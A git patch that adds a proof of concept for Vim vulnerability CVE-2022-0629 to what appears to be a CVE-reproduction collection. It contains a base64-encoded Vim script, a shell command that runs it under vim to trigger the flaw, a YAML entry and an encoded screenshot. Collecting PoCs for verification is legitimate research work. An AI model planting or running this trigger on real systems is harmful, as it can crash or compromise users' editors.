From ff6b7e4be96d267094e844e3642f0aa65321259a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=96=87=E6=9D=B0?= Date: Fri, 21 Oct 2022 11:12:46 +0800 Subject: [PATCH] ADD CVE-2022-0629 --- cve/vim/2022/CVE-2022-0629/README.md | 8 +++++++ .../2022/CVE-2022-0629/png/CVE-2022-0629.png | Bin 0 -> 30179 bytes cve/vim/2022/CVE-2022-0629/poc | 7 ++++++ cve/vim/2022/yaml/CVE-2022-0629.yaml | 20 ++++++++++++++++++ vulnerability_list.yaml | 1 + 5 files changed, 36 insertions(+) create mode 100644 cve/vim/2022/CVE-2022-0629/README.md create mode 100644 cve/vim/2022/CVE-2022-0629/png/CVE-2022-0629.png create mode 100644 cve/vim/2022/CVE-2022-0629/poc create mode 100644 cve/vim/2022/yaml/CVE-2022-0629.yaml diff --git a/cve/vim/2022/CVE-2022-0629/README.md b/cve/vim/2022/CVE-2022-0629/README.md new file mode 100644 index 00000000..c2b73f44 --- /dev/null +++ b/cve/vim/2022/CVE-2022-0629/README.md @@ -0,0 +1,8 @@ +### 漏洞验证 +```shell +$ echo -ne "bm9ybTEwMGdy3YAKZnUgUigpCmxldCBsaW5lPWdldGxpbmUoMSkKcmV0dSBsaW5lCmVuZGYKCmNh +bGwgYXNzZXJ0X2VxdWFsKDEsUigpKQo=" | base64 -d > poc + +$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!" +``` +![](./png/CVE-2022-0629.png) \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-0629/png/CVE-2022-0629.png b/cve/vim/2022/CVE-2022-0629/png/CVE-2022-0629.png new file mode 100644 index 0000000000000000000000000000000000000000..3c68eb63c88578e89e6e77c508bea0e9275816ca GIT binary patch literal 30179 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 